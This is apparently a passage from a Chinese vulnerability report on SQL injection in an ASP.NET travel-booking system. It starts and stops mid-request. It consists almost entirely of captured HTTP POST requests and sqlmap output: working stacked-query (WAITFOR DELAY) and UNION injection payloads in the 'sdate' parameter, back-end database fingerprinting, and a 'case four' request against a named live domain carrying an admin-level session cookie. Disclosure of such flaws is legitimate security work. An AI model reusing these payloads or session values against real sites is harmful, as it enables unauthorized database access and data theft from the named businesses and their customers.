Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI%2Bwrcg562%2B6K%2BBPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI%2Bwrcg5L%2Bd6ZmpPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI%2Bwrcg5YW25a6DPC9hPjwvbGk%2BPC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E%2BPGkgY2xhc3M9ImljbzA3Ij48L2k%2BPHVsIGNsYXNzPSJzdWItbmF2Ij48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n%2BiuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI%2Bwrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk%2BPC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWCAIBDw8WAh8ABVtDb3B5cmlnaHQgJmNvcHk7IDIwMTQgUGlhb1lvdS5vcmcgYWxsIHJpZ2h0cyByZXNlcnZlZC4g5LiK5rW355ub5Luj5L%2Bh5oGv56eR5oqA5pyJ6ZmQ5YWs5Y%2B4ZGQCAw8PFgIfAAVc5Zyw5Z2A77ya5LiK5rW35biC5rKq5p2%2B5YWs6LevMTM5OeW8hOmdkuW5tOWfjjE0NeWPtzcxMOWupCjlnLDpk4E55Y%2B357q%2F5Lmd5Lqt56uZM%2BWPt%2BWHuuWPoylkZAIFDw8WAh8ABTrnlLXor53vvJowMjEtNTE2OTY0NjbjgIEwMjEtNjc4MDAyMjcg5Lyg55yf77yaMDIxLTUxNjg1ODgyZGQCBw8WAh8ABUs8c2NyaXB0IHR5cGU9J3RleHQvamF2YXNjcmlwdCc%2Bc2V0SW50ZXJ2YWwoJ21lc3NhZ2VfdHgoKScsIDMwMDAwKTs8L3NjcmlwdD5kZEaS72QiTXejdAGN7%2FQQ8kdM%2F43BBbYry4H2J%2BmMxhAz&__EVENTVALIDATION=%2FwEWCgKj1Jz9DQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCbVztzxT1ROuhNWQV5yGReNW8vbQEp%2BKL8PsKAmeThYB&sdate=2015-6-15&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=36

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=/wEPDwUKMTE2MDQ5NzAwMQ9kFgICAw9kFgYCAQ9kFgwCAw8PFgIeBFRleHQFB2Fsa3NkbGtkZAIFDw8WAh8ABQwwMjEtNjc4MDAyMjdkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS/oeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFoA88bGk+PGEgaHJlZj0iIyI+57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS/oeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI+wrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZsaWdodF9pbnQvIj7CtyDlm73pmYXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0hvdGVsLyI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5p+l6K+iPC9hPjxpIGNsYXNzPSJpY28wNCI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvUmV0dXJuLmFzcHgiPsK3IOmAgOelqOiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvc2NncV9saXN0LmFzcHgiPsK3IOWNh+iIseaUueacn+iusOW9lTwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI+wrcg562+6K+BPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI+wrcg5L+d6ZmpPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI+wrcg5YW25a6DPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E+PGkgY2xhc3M9ImljbzA3Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n+iuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI+wrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk+PC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWCAIBDw8WAh8ABVtDb3B5cmlnaHQgJmNvcHk7IDIwMTQgUGlhb1lvdS5vcmcgYWxsIHJpZ2h0cyByZXNlcnZlZC4g5LiK5rW355ub5Luj5L+h5oGv56eR5oqA5pyJ6ZmQ5YWs5Y+4ZGQCAw8PFgIfAAVc5Zyw5Z2A77ya5LiK5rW35biC5rKq5p2+5YWs6LevMTM5OeW8hOmdkuW5tOWfjjE0NeWPtzcxMOWupCjlnLDpk4E55Y+357q/5Lmd5Lqt56uZM+WPt+WHuuWPoylkZAIFDw8WAh8ABTrnlLXor53vvJowMjEtNTE2OTY0NjbjgIEwMjEtNjc4MDAyMjcg5Lyg55yf77yaMDIxLTUxNjg1ODgyZGQCBw8WAh8ABUs8c2NyaXB0IHR5cGU9J3RleHQvamF2YXNjcmlwdCc+c2V0SW50ZXJ2YWwoJ21lc3NhZ2VfdHgoKScsIDMwMDAwKTs8L3NjcmlwdD5kZEaS72QiTXejdAGN7/QQ8kdM/43BBbYry4H2J+mMxhAz&__EVENTVALIDATION=/wEWCgKj1Jz9DQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCbVztzxT1ROuhNWQV5yGReNW8vbQEp+KL8PsKAmeThYB&sdate=2015-6-15');WAITFOR DELAY '0:0:10'--&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=36
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: __VIEWSTATE=/wEPDwUKMTE2MDQ5NzAwMQ9kFgICAw9kFgYCAQ9kFgwCAw8PFgIeBFRleHQFB2Fsa3NkbGtkZAIFDw8WAh8ABQwwMjEtNjc4MDAyMjdkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS/oeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFoA88bGk+PGEgaHJlZj0iIyI+57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS/oeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI+wrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZsaWdodF9pbnQvIj7CtyDlm73pmYXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0hvdGVsLyI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5p+l6K+iPC9hPjxpIGNsYXNzPSJpY28wNCI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvUmV0dXJuLmFzcHgiPsK3IOmAgOelqOiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvc2NncV9saXN0LmFzcHgiPsK3IOWNh+iIseaUueacn+iusOW9lTwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI+wrcg562+6K+BPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI+wrcg5L+d6ZmpPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI+wrcg5YW25a6DPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E+PGkgY2xhc3M9ImljbzA3Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n+iuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI+wrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk+PC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWCAIBDw8WAh8ABVtDb3B5cmlnaHQgJmNvcHk7IDIwMTQgUGlhb1lvdS5vcmcgYWxsIHJpZ2h0cyByZXNlcnZlZC4g5LiK5rW355ub5Luj5L+h5oGv56eR5oqA5pyJ6ZmQ5YWs5Y+4ZGQCAw8PFgIfAAVc5Zyw5Z2A77ya5LiK5rW35biC5rKq5p2+5YWs6LevMTM5OeW8hOmdkuW5tOWfjjE0NeWPtzcxMOWupCjlnLDpk4E55Y+357q/5Lmd5Lqt56uZM+WPt+WHuuWPoylkZAIFDw8WAh8ABTrnlLXor53vvJowMjEtNTE2OTY0NjbjgIEwMjEtNjc4MDAyMjcg5Lyg55yf77yaMDIxLTUxNjg1ODgyZGQCBw8WAh8ABUs8c2NyaXB0IHR5cGU9J3RleHQvamF2YXNjcmlwdCc+c2V0SW50ZXJ2YWwoJ21lc3NhZ2VfdHgoKScsIDMwMDAwKTs8L3NjcmlwdD5kZEaS72QiTXejdAGN7/QQ8kdM/43BBbYry4H2J+mMxhAz&__EVENTVALIDATION=/wEWCgKj1Jz9DQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCbVztzxT1ROuhNWQV5yGReNW8vbQEp+KL8PsKAmeThYB&sdate=2015-6-15') UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(113)+CHAR(84)+CHAR(79)+CHAR(88)+CHAR(74)+CHAR(83)+CHAR(113)+CHAR(85)+CHAR(99)+CHAR(105)+CHAR(108)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=36
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
current database:    'sdpiaoyou'

案例四：http://ryxtrip.com/

POST /Financial/fksq_meb.aspx HTTP/1.1
Host: ryxtrip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://ryxtrip.com/Financial/fksq_meb.aspx
Cookie: VERSION=2,0,0,0; BRIDGE_INVITE_0=0; BRIDGE_REFRESH=5000; BRIDGE_CLOCK=1434351705610; BRIDGE_NEED=1; baidu_qiao_v3_count_6031340=1; ASP.NET_SessionId=zbrl5miccffv3gmrupifsgn5; Hm_lvt_da5d85e35ea2fc856fd93df2a2962611=1434351655; Hm_lpvt_da5d85e35ea2fc856fd93df2a2962611=1434351699; tktcookie=memberid=7&truename=dkajsdkj&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin; BRIDGE_R6031340=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3786
__VIEWSTATE=%2FwEPDwUKMTE2MDQ5NzAwMQ9kFgICAw9kFgYCAQ9kFgwCAw8PFgIeBFRleHQFCGRrYWpzZGtqZGQCBQ8PFgIfAAUMMDIxLTUxMDk2OTU5ZGQCBw8WAh4HVmlzaWJsZWcWAgIBDw8WAh8ABQ1BZG1pbmlzdHJhdG9yZGQCCQ8PFgQeC05hdmlnYXRlVXJsBRR%2BL1N5c3RlbS9teWluZm8uYXNweB8ABQzmiJHnmoTkv6Hmga9kZAILDw8WBB8CBRJ%2BL21lbWJlci9leGl0LmFzcHgfAAUM5a6J5YWo6YCA5Ye6ZGQCDQ8WAh8ABaAPPGxpPjxhIGhyZWY9IiMiPuezu%2Be7n%2BeuoeeQhjwvYT48aSBjbGFzcz0iaWNvMDMiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvU3lzdGVtL215aW5mby5hc3B4Ij7CtyDkvIHkuJrkv6Hmga88L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL21lbWJlci9Hcm91cC5hc3B4Ij7CtyDpg6jpl6jliIbnu4Q8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL21lbWJlci9GbGFnLmFzcHgiPsK3IOinkuiJsuadg%2BmZkDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL1BlcnNvbm5lbC5hc3B4Ij7CtyDlkZjlt6XnrqHnkIY8L2E%2BPC9saT48L3VsPjwvbGk%2BPGxpPjxhIGhyZWY9IiMiPuW3ruaXhemihOWumjwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmxpZ2h0LyI%2Bwrcg5Zu95YaF5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9GbGlnaHRfaW50LyI%2Bwrcg5Zu96ZmF5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9Ib3RlbC8iPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvVHJhaW4vIj7CtyDngavovabnpag8L2E%2BPC9saT48L3VsPjwvbGk%2BPGxpPjxhIGhyZWY9IiMiPuiuouWNleafpeivojwvYT48aSBjbGFzcz0iaWNvMDQiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvT3JkZXIvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvaG90ZWwuYXNweCI%2Bwrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9PcmRlci90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL09yZGVyL1JldHVybi5hc3B4Ij7CtyDpgIDnpajorrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL09yZGVyL3NjZ3FfbGlzdC5hc3B4Ij7CtyDljYfoiLHmlLnmnJ%2ForrDlvZU8L2E%2BPC9saT48L3VsPjwvbGk%2BPGxpPjxhIGhyZWY9IiMiPuiuouWNleWuoeaguDwvYT48aSBjbGFzcz0iaWNvMDUiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvQ2hlY2svZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvQ2hlY2svaG90ZWwuYXNweCI%2Bwrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9DaGVjay90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E%2BPC9saT48L3VsPjwvbGk%2BPGxpPjxhIGhyZWY9IiMiPuW3ruaXheaKpeihqDwvYT48aSBjbGFzcz0iaWNvMDYiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvUmVwb3J0L2ZsaWdodC5hc3B4Ij7CtyDpo57mnLrnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL1JlcG9ydC90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL1JlcG9ydC9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL1JlcG9ydC92aXNhLmFzcHgiPsK3IOetvuivgTwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2J4LmFzcHgiPsK3IOS%2FnemZqTwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L290aGVyLmFzcHgiPsK3IOWFtuWugzwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6LSi5Yqh566h55CGPC9hPjxpIGNsYXNzPSJpY28wNyI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvZmtzcV9tZWIuYXNweCI%2Bwrcg5LuY5qy%2B55Sz6K%2B36K6w5b2VPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvcGF5X2hpc3RvcnkuYXNweCI%2Bwrcg5bey5LuY5qy%2B6K6w5b2VPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvb3JkZXJzX2FsbC5hc3B4Ij7CtyDnu7zlkIjnu5%2ForqE8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC94Y2Rfb3JkZXJzLmFzcHgiPsK3IOihjOeoi%2BWNleS6pOaOpTwvYT48L2xpPjwvdWw%2BPC9saT5kAgsPFgIeC18hSXRlbUNvdW50ZmQCDQ9kFggCAQ8PFgIfAAVI5LiK5rW35pel5pyI6KGM6Iiq56m656Wo5Yqh5pyN5Yqh5pyJ6ZmQ5YWs5Y%2B4ICAgICDmsqpJQ1DlpIcxMTA0Mjc2NOWPty0xZGQCAw8PFgIfAAUw5Zyw5Z2A77ya5LiK5rW35biC5aSn5rih5rKz6LevMTcxOOWPt0LluqdCNzA35a6kZGQCBQ8PFgIfAAU655S16K%2Bd77yaMDIxLTUxMDk2OTU5IDAyMS01MTA5NjEwMCAgIOS8oOecn%2B%2B8mjAyMS01MTA2MjA5MGRkAgcPFgIfAAVLPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPnNldEludGVydmFsKCdtZXNzYWdlX3R4KCknLCAzMDAwMCk7PC9zY3JpcHQ%2BZGQLlUfXjIPcz7cRnJLQ7WiqVS6Qk58FN7zSQNz%2B3gjT%2Bw%3D%3D&__EVENTVALIDATION=%2FwEWCgKI3oXRCgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCb8RnfQLgjfBlqC5ElREBfhxqKy8PXOzPeQwVu%2F7scte&sdate=2015%2F6%2F15&edate=2015%2F6%2F15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=7

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=/wEPDwUKMTE2MDQ5NzAwMQ9kFgICAw9kFgYCAQ9kFgwCAw8PFgIeBFRleHQFCGRrYWpzZGtqZGQCBQ8PFgIfAAUMMDIxLTUxMDk2OTU5ZGQCBw8WAh4HVmlzaWJsZWcWAgIBDw8WAh8ABQ1BZG1pbmlzdHJhdG9yZGQCCQ8PFgQeC05hdmlnYXRlVXJsBRR+L1N5c3RlbS9teWluZm8uYXNweB8ABQzmiJHnmoTkv6Hmga9kZAILDw8WBB8CBRJ+L21lbWJlci9leGl0LmFzcHgfAAUM5a6J5YWo6YCA5Ye6ZGQCDQ8WAh8ABaAPPGxpPjxhIGhyZWY9IiMiPuezu+e7n+euoeeQhjwvYT48aSBjbGFzcz0iaWNvMDMiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvU3lzdGVtL215aW5mby5hc3B4Ij7CtyDkvIHkuJrkv6Hmga88L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9Hcm91cC5hc3B4Ij7CtyDpg6jpl6jliIbnu4Q8L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9GbGFnLmFzcHgiPsK3IOinkuiJsuadg+mZkDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL1BlcnNvbm5lbC5hc3B4Ij7CtyDlkZjlt6XnrqHnkIY8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuW3ruaXhemihOWumjwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmxpZ2h0LyI+wrcg5Zu95YaF5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GbGlnaHRfaW50LyI+wrcg5Zu96ZmF5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9Ib3RlbC8iPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvVHJhaW4vIj7CtyDngavovabnpag8L2E+P